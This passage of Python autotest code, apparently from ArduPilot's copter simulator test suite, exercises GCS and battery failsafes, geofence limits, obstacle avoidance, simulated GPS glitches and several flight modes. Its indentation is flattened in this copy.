self.wait_statustext("GCS Failsafe")
self.wait_disarmed()
self.end_subtest("GCS failsafe SmartRTL twice")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.context_pop()
# Trigger telemetry loss with failsafe disabled. Verify no action taken.
self.start_subtest("GCS failsafe disabled test: FS_GCS_ENABLE=0 should take no failsafe action")
self.setGCSfailsafe(0)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed GCS failsafe disabled test")
# Trigger telemetry loss with failsafe enabled. Verify
# failsafe triggers to RTL. Restore telemetry, verify failsafe
# clears, and change modes.
self.start_subtest("GCS failsafe recovery test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.change_mode("LOITER")
self.end_subtest("Completed GCS failsafe recovery test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe RTL with no options test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and land completes
self.start_subtest("GCS failsafe LAND with no options test: FS_GCS_ENABLE=5 & FS_OPTIONS=0")
self.setGCSfailsafe(5)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe land with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->RTL with no options test: FS_GCS_ENABLE=3 & FS_OPTIONS=0")
self.setGCSfailsafe(3)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->Land with no options test: FS_GCS_ENABLE=4 & FS_OPTIONS=0")
self.setGCSfailsafe(4)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->Land with no options test")
# Trigger telemetry loss with an invalid failsafe value. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe invalid value with no options test: FS_GCS_ENABLE=99 & FS_OPTIONS=0")
self.setGCSfailsafe(99)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe invalid value with no options test")
# Trigger telemetry loss with failsafe enabled to test FS_OPTIONS settings
self.start_subtest("GCS failsafe with option bit tests: FS_GCS_ENABLE=1 & FS_OPTIONS=64/2/16")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 16)
self.takeoffAndMoveAway()
self.progress("Testing continue in pilot controlled modes")
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Pilot Control", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue in auto mission")
self.set_parameter('FS_OPTIONS', 2)
self.change_mode("AUTO")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Auto Mode", timeout=60)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue landing in land mode")
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Landing", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe with option bits")
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.progress("All GCS failsafe tests complete")
self.reboot_sitl()
# Tests all actions and logic behind the battery failsafe
def fly_battery_failsafe(self, timeout=300):
ex = None
try:
self.test_battery_failsafe(timeout=timeout)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_parameter('BATT_LOW_VOLT', 0)
self.set_parameter('BATT_CRT_VOLT', 0)
self.set_parameter('BATT_FS_LOW_ACT', 0)
self.set_parameter('BATT_FS_CRT_ACT', 0)
self.set_parameter('FS_OPTIONS', 0)
self.reboot_sitl()
if ex is not None:
raise ex
def test_battery_failsafe(self, timeout=300):
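        # BATT_FS_LOW_ACT / BATT_FS_CRT_ACT select the low/critical
        # battery actions (0=none, 1=Land, 2=RTL, 3=SmartRTL,
        # 4=SmartRTL-or-Land, 5=Terminate).  SIM_BATT_VOLTAGE is driven
        # below BATT_LOW_VOLT / BATT_CRT_VOLT to trigger each stage.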
self.progress("Configure battery failsafe parameters")
self.set_parameters({
'SIM_SPEEDUP': 4,
'BATT_LOW_VOLT': 11.5,
'BATT_CRT_VOLT': 10.1,
'BATT_FS_LOW_ACT': 0,
'BATT_FS_CRT_ACT': 0,
'FS_OPTIONS': 0,
'SIM_BATT_VOLTAGE': 12.5,
})
# Trigger low battery condition with failsafe disabled. Verify
# no action taken.
self.start_subtest("Batt failsafe disabled test")
self.takeoffAndMoveAway()
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.change_mode("RTL")
self.wait_rtl_complete()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed Batt failsafe disabled test")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify RTL and Land actions
# complete.
self.start_subtest("Two stage battery failsafe test with RTL and Land")
self.takeoffAndMoveAway()
self.delay_sim_time(3)
self.set_parameter('BATT_FS_LOW_ACT', 2)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("RTL")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with RTL and Land")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify both SmartRTL
# actions complete
self.start_subtest("Two stage battery failsafe test with SmartRTL")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 3)
self.set_parameter('BATT_FS_CRT_ACT', 4)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.change_mode("LOITER")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with SmartRTL")
# Trigger low battery condition in land mode with FS_OPTIONS
# set to allow land mode to continue. Verify landing completes
# uninterrupted.
self.start_subtest("Battery failsafe with FS_OPTIONS set to continue landing")
self.takeoffAndMoveAway()
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe with FS_OPTIONS set to continue landing")
# Trigger a critical battery condition, which triggers a land
# mode failsafe. Trigger an RC failure. Verify the RC failsafe
# is prevented from stopping the low battery landing.
self.start_subtest("Battery failsafe critical landing")
self.takeoffAndMoveAway(100, 50)
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter('BATT_FS_LOW_ACT', 1)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('FS_THR_ENABLE', 1)
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.wait_mode("LAND")
self.delay_sim_time(10)
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(10)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.set_parameter("SIM_RC_FAIL", 0)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe critical landing")
# Trigger low battery condition with failsafe set to terminate. Copter will disarm and crash.
self.start_subtest("Battery failsafe terminate")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 5)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.wait_disarmed()
self.end_subtest("Completed terminate failsafe test")
self.progress("All Battery failsafe tests complete")
    # fly_stability_patch - fly south, then hold loiter within 5m
    # altitude and 10m position while reducing one motor to 65%
    # efficiency
def fly_stability_patch(self,
holdtime=30,
maxaltchange=5,
maxdistchange=10):
self.takeoff(10, mode="LOITER")
# first south
self.progress("turn south")
self.set_rc(4, 1580)
self.wait_heading(180)
self.set_rc(4, 1500)
        # fly forward (south) 80m
self.set_rc(2, 1100)
self.wait_distance(80)
self.set_rc(2, 1500)
        # wait for the copter to slow down
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
        # cut motor 1 to 65% efficiency
self.progress("Cutting motor 1 to 65% efficiency")
self.set_parameter("SIM_ENGINE_MUL", 0.65)
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
("Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange)))
# restore motor 1 to 100% efficiency
self.set_parameter("SIM_ENGINE_MUL", 1.0)
self.progress("Stability patch and Loiter OK for %us" % holdtime)
self.progress("RTL after stab patch")
self.do_RTL()
def debug_arming_issue(self):
while True:
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() in ["STATUSTEXT", "COMMAND_ACK"]:
print("Got: %s" % str(m))
if self.mav.motors_armed():
self.progress("Armed")
return
    # AVOID_BEHAVE values: 0 = slide along the fence, 1 = stop at it
    avoid_behave_slide = 0
def fly_fence_avoid_test_radius_check(self, timeout=180, avoid_behave=avoid_behave_slide):
using_mode = "LOITER" # must be something which adjusts velocity!
self.change_mode(using_mode)
self.set_parameter("FENCE_ENABLE", 1) # fence
self.set_parameter("FENCE_TYPE", 2) # circle
fence_radius = 15
self.set_parameter("FENCE_RADIUS", fence_radius)
fence_margin = 3
self.set_parameter("FENCE_MARGIN", fence_margin)
self.set_parameter("AVOID_ENABLE", 1)
self.set_parameter("AVOID_BEHAVE", avoid_behave)
self.set_parameter("RC10_OPTION", 40) # avoid-enable
self.wait_ready_to_arm()
self.set_rc(10, 2000)
home_distance = self.distance_to_home(use_cached_home=True)
if home_distance > 5:
raise PreconditionFailedException("Expected to be within 5m of home")
self.zero_throttle()
self.arm_vehicle()
self.set_rc(3, 1700)
self.wait_altitude(10, 100, relative=True)
self.set_rc(3, 1500)
self.set_rc(2, 1400)
self.wait_distance_to_home(12, 20)
tstart = self.get_sim_time()
        push_time = 70  # push against the barrier for 70 seconds
failed_max = False
failed_min = False
while True:
if self.get_sim_time() - tstart > push_time:
self.progress("Push time up")
break
# make sure we don't RTL:
if not self.mode_is(using_mode):
raise NotAchievedException("Changed mode away from %s" % using_mode)
distance = self.distance_to_home(use_cached_home=True)
inner_radius = fence_radius - fence_margin
want_min = inner_radius - 1 # allow 1m either way
want_max = inner_radius + 1 # allow 1m either way
self.progress("Push: distance=%f %f<want<%f" %
(distance, want_min, want_max))
if distance < want_min:
if failed_min is False:
self.progress("Failed min")
failed_min = True
if distance > want_max:
if failed_max is False:
self.progress("Failed max")
failed_max = True
if failed_min and failed_max:
raise NotAchievedException("Failed both min and max checks. Clever")
if failed_min:
raise NotAchievedException("Failed min")
if failed_max:
raise NotAchievedException("Failed max")
self.set_rc(2, 1500)
self.do_RTL()
def fly_fence_avoid_test(self, timeout=180):
self.fly_fence_avoid_test_radius_check(avoid_behave=1, timeout=timeout)
self.fly_fence_avoid_test_radius_check(avoid_behave=0, timeout=timeout)
def assert_prearm_failure(self, expected_statustext, timeout=5, ignore_prearm_failures=[]):
seen_statustext = False
seen_command_ack = False
self.drain_mav()
tstart = self.get_sim_time_cached()
arm_last_send = 0
while True:
if seen_command_ack and seen_statustext:
break
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException(
"Did not see failure-to-arm messages (statustext=%s command_ack=%s" %
(seen_statustext, seen_command_ack))
if now - arm_last_send > 1:
arm_last_send = now
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() == "STATUSTEXT":
if expected_statustext in m.text:
self.progress("Got: %s" % str(m))
seen_statustext = True
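                # m.text[8:] strips the leading "PreArm: " prefix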
elif "PreArm" in m.text and m.text[8:] not in ignore_prearm_failures:
self.progress("Got: %s" % str(m))
raise NotAchievedException("Unexpected prearm failure (%s)" % m.text)
if m.get_type() == "COMMAND_ACK":
print("Got: %s" % str(m))
if m.command == mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM:
if m.result != 4:
raise NotAchievedException("command-ack says we didn't fail to arm")
self.progress("Got: %s" % str(m))
seen_command_ack = True
if self.mav.motors_armed():
raise NotAchievedException("Armed when we shouldn't have")
# fly_fence_test - fly east until you hit the horizontal circular fence
def fly_fence_test(self, timeout=180):
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
# fence requires home to be set:
m = self.poll_home_position()
if m is None:
raise NotAchievedException("Did not receive HOME_POSITION")
self.progress("home: %s" % str(m))
self.start_subtest("ensure we can't arm if outside fence")
self.load_fence("fence-in-middle-of-nowhere.txt")
self.delay_sim_time(5) # let fence check run so it loads-from-eeprom
self.assert_prearm_failure("vehicle outside fence")
self.progress("Failed to arm outside fence (good!)")
self.clear_fence()
self.delay_sim_time(5) # let fence breach clear
self.drain_mav()
self.end_subtest("ensure we can't arm if outside fence")
self.start_subtest("ensure we can't arm with bad radius")
self.context_push()
self.set_parameter("FENCE_RADIUS", -1)
self.assert_prearm_failure("Invalid FENCE_RADIUS value")
self.context_pop()
self.progress("Failed to arm with bad radius")
self.drain_mav()
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("ensure we can't arm with bad alt")
self.context_push()
self.set_parameter("FENCE_ALT_MAX", -1)
self.assert_prearm_failure("Invalid FENCE_ALT_MAX value")
self.context_pop()
self.progress("Failed to arm with bad altitude")
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("Check breach-fence behaviour")
self.set_parameter("FENCE_TYPE", 2)
self.takeoff(10, mode="LOITER")
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
fence_radius = self.get_parameter("FENCE_RADIUS")
self.progress("flying forward (east) until we hit fence")
pitching_forward = True
self.set_rc(2, 1100)
self.progress("Waiting for fence breach")
tstart = self.get_sim_time()
while not self.mode_is("RTL"):
if self.get_sim_time_cached() - tstart > 30:
raise NotAchievedException("Did not breach fence")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f (fence radius=%f)" %
(alt, home_distance, fence_radius))
self.progress("Waiting until we get home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
self.progress("Alt: %.02f HomeDistance: %.02f" %
(alt, home_distance))
# recenter pitch sticks once we're home so we don't fly off again
if pitching_forward and home_distance < 50:
pitching_forward = False
self.set_rc(2, 1475)
# disable fence
self.set_parameter("FENCE_ENABLE", 0)
if (alt <= 1 and home_distance < 10) or (not self.armed() and home_distance < 10):
# reduce throttle
self.zero_throttle()
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.progress("Reached home OK")
self.zero_throttle()
return
        # given we're testing RTL, doing an RTL here probably doesn't make sense
home_distance = self.distance_to_home(use_cached_home=True)
raise AutoTestTimeoutException(
"Fence test failed to reach home (%fm distance) - "
"timed out after %u seconds" % (home_distance, timeout,))
# fly_alt_max_fence_test - fly up until you hit the fence ceiling
    def fly_alt_max_fence_test(self):
        """Hold loiter position."""
        self.takeoff(10, mode="LOITER")
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 1)
self.change_alt(10)
# first east
self.progress("turning east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
self.progress("flying east 20m")
self.set_rc(2, 1100)
self.wait_distance(20)
self.progress("flying up")
self.set_rc_from_map({
2: 1500,
3: 1800,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
self.zero_throttle()
# fly_alt_min_fence_test - fly down until you hit the fence floor
def fly_alt_min_fence_test(self):
self.takeoff(30, mode="LOITER", timeout=60)
# enable fence, disable avoidance
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 8)
self.set_parameter("FENCE_ALT_MIN", 20)
self.change_alt(30)
# Activate the floor fence
# TODO this test should run without requiring this
self.do_fence_enable()
# first east
self.progress("turn east")
self.set_rc(4, 1580)
self.wait_heading(160, timeout=60)
self.set_rc(4, 1500)
# fly forward (east) at least 20m
self.set_rc(2, 1100)
self.wait_distance(20)
# stop flying forward and start flying down:
self.set_rc_from_map({
2: 1500,
3: 1200,
})
# wait for fence to trigger
self.wait_mode('RTL', timeout=120)
self.wait_rtl_complete()
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.zero_throttle()
def fly_fence_floor_enabled_landing(self):
""" fly_fence_floor_enabled_landing. Ensures we can initiate and complete
an RTL while the fence is enabled. """
fence_bit = mavutil.mavlink.MAV_SYS_STATUS_GEOFENCE
self.progress("Test Landing while fence floor enabled")
self.set_parameter("AVOID_ENABLE", 0)
self.set_parameter("FENCE_TYPE", 15)
self.set_parameter("FENCE_ALT_MIN", 10)
self.set_parameter("FENCE_ALT_MAX", 20)
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=15)
# Check fence is enabled
self.do_fence_enable()
self.assert_fence_enabled()
# Change to RC controlled mode
self.change_mode('LOITER')
self.set_rc(3, 1800)
self.wait_mode('RTL', timeout=120)
self.wait_landed_and_disarmed()
self.assert_fence_enabled()
# Assert fence is not healthy
self.assert_sensor_state(fence_bit, healthy=False)
# Disable the fence using mavlink command to ensure cleaned up SITL state
self.do_fence_disable()
self.assert_fence_disabled()
def fly_gps_glitch_loiter_test(self, timeout=30, max_distance=20):
"""fly_gps_glitch_loiter_test. Fly south east in loiter and test
reaction to gps glitch."""
self.takeoff(10, mode="LOITER")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
        for i in range(glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# turn south east
self.progress("turn south east")
self.set_rc(4, 1580)
try:
self.wait_heading(150)
self.set_rc(4, 1500)
# fly forward (south east) at least 60m
self.set_rc(2, 1100)
self.wait_distance(60)
self.set_rc(2, 1500)
# wait for copter to slow down
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
tnow = tstart
start_pos = self.sim_location()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# record position for 30 seconds
while tnow < tstart + timeout:
tnow = self.get_sim_time_cached()
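            # step through the glitch list at roughly 2.2 glitches per
            # simulated second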
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# turn off glitching if we've reached the end of glitch list
if glitch_current >= glitch_num:
glitch_current = -1
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
else:
self.progress("Applying glitch %u" % glitch_current)
# move onto the next glitch
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
# start displaying distance moved after all glitches applied
if glitch_current == -1:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
alt = m.alt/1000.0 # mm -> m
curr_pos = self.sim_location()
moved_distance = self.get_distance(curr_pos, start_pos)
self.progress("Alt: %.02f Moved: %.0f" %
(alt, moved_distance))
if moved_distance > max_distance:
raise NotAchievedException(
"Moved over %u meters, Failed!" % max_distance)
else:
self.drain_mav()
# disable gps glitch
if glitch_current != -1:
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS glitch test passed!"
" stayed within %u meters for %u seconds" %
(max_distance, timeout))
self.do_RTL()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
# fly_gps_glitch_auto_test - fly mission and test reaction to gps glitch
def fly_gps_glitch_auto_test(self, timeout=180):
# set-up gps glitch array
glitch_lat = [0.0002996,
0.0006958,
0.0009431,
0.0009991,
0.0009444,
0.0007716,
0.0006221]
glitch_lon = [0.0000717,
0.0000912,
0.0002761,
0.0002626,
0.0002807,
0.0002049,
0.0001304]
glitch_num = len(glitch_lat)
self.progress("GPS Glitches:")
        for i in range(glitch_num):
self.progress("glitch %d %.7f %.7f" %
(i, glitch_lat[i], glitch_lon[i]))
# Fly mission #1
self.progress("# Load copter_glitch_mission")
# load the waypoint count
num_wp = self.load_mission("copter_glitch_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_glitch_mission failed")
# turn on simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(True)
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.zero_throttle()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode('AUTO')
self.set_rc(3, 1500)
# wait until 100m from home
try:
self.wait_distance(100, 5, 90)
except Exception as e:
if self.use_map:
self.show_gps_and_sim_positions(False)
raise e
# record time and position
tstart = self.get_sim_time()
# initialise current glitch
glitch_current = 0
self.progress("Apply first glitch")
self.set_parameter("SIM_GPS_GLITCH_X", glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y", glitch_lon[glitch_current])
        # step through the glitch list until it is exhausted
while glitch_current < glitch_num:
tnow = self.get_sim_time()
desired_glitch_num = int((tnow - tstart) * 2.2)
if desired_glitch_num > glitch_current and glitch_current != -1:
glitch_current = desired_glitch_num
# apply next glitch
if glitch_current < glitch_num:
self.progress("Applying glitch %u" % glitch_current)
self.set_parameter("SIM_GPS_GLITCH_X",
glitch_lat[glitch_current])
self.set_parameter("SIM_GPS_GLITCH_Y",
glitch_lon[glitch_current])
# turn off glitching
self.progress("Completed Glitches")
self.set_parameter("SIM_GPS_GLITCH_X", 0)
self.set_parameter("SIM_GPS_GLITCH_Y", 0)
# continue with the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# wait for arrival back home
self.wait_distance_to_home(0, 10, timeout=timeout)
# turn off simulator display of gps and actual position
if self.use_map:
self.show_gps_and_sim_positions(False)
self.progress("GPS Glitch test Auto completed: passed!")
self.wait_disarmed()
# re-arming is problematic because the GPS is glitching!
self.reboot_sitl()
    # fly_simple - assumes the simple bearing is initialised to be
    # directly north; flies a box: 'side' metres south, 8 seconds west,
    # side/2 metres north, 8 seconds east
def fly_simple(self, side=50):
self.takeoff(10, mode="LOITER")
# set SIMPLE mode for all flight modes
self.set_parameter("SIMPLE", 63)
# switch to stabilize mode
self.change_mode('STABILIZE')
self.set_rc(3, 1545)
# fly south 50m
self.progress("# Flying south %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side, 5, 60)
self.set_rc(1, 1500)
# fly west 8 seconds
self.progress("# Flying west for 8 seconds")
self.set_rc(2, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# fly north 25 meters
self.progress("# Flying north %u meters" % (side/2.0))
self.set_rc(1, 1700)
self.wait_distance(side/2, 5, 60)
self.set_rc(1, 1500)
# fly east 8 seconds
self.progress("# Flying east for 8 seconds")
self.set_rc(2, 1700)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + 8):
self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_rc(2, 1500)
# hover in place
self.hover()
self.do_RTL(timeout=500)
# fly_super_simple - flies a circle around home for 45 seconds
def fly_super_simple(self, timeout=45):
self.takeoff(10, mode="LOITER")
# fly forward 20m
self.progress("# Flying forward 20 meters")
self.set_rc(2, 1300)
self.wait_distance(20, 5, 60)
self.set_rc(2, 1500)
# set SUPER SIMPLE mode for all flight modes
self.set_parameter("SUPER_SIMPLE", 63)
        # switch to alt-hold mode
self.change_mode("ALT_HOLD")
self.set_rc(3, 1500)
# start copter yawing slowly
self.set_rc(4, 1550)
# roll left for timeout seconds
self.progress("# rolling left from pilot's POV for %u seconds"
% timeout)
self.set_rc(1, 1300)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < (tstart + timeout):
self.mav.recv_match(type='VFR_HUD', blocking=True)
# stop rolling and yawing
self.set_rc(1, 1500)
self.set_rc(4, 1500)
# restore simple mode parameters to default
self.set_parameter("SUPER_SIMPLE", 0)
# hover in place
self.hover()
self.do_RTL()
    # fly_circle - flies a circle with 30m radius
def fly_circle(self, holdtime=36):
# the following should not be required. But there appears to
# be a physics failure in the simulation which is causing CI
# to fall over a lot. -pb 202007021209
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
# face west
self.progress("turn west")
self.set_rc(4, 1580)
self.wait_heading(270)
self.set_rc(4, 1500)
# set CIRCLE radius
self.set_parameter("CIRCLE_RADIUS", 3000)
        # fly forward (west) at least 100m
self.set_rc(2, 1100)
self.wait_distance(100)
# return pitch stick back to middle
self.set_rc(2, 1500)
# set CIRCLE mode
self.change_mode('CIRCLE')
# wait
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
tstart = self.get_sim_time()
self.progress("Circle at %u meters for %u seconds" %
(start_altitude, holdtime))
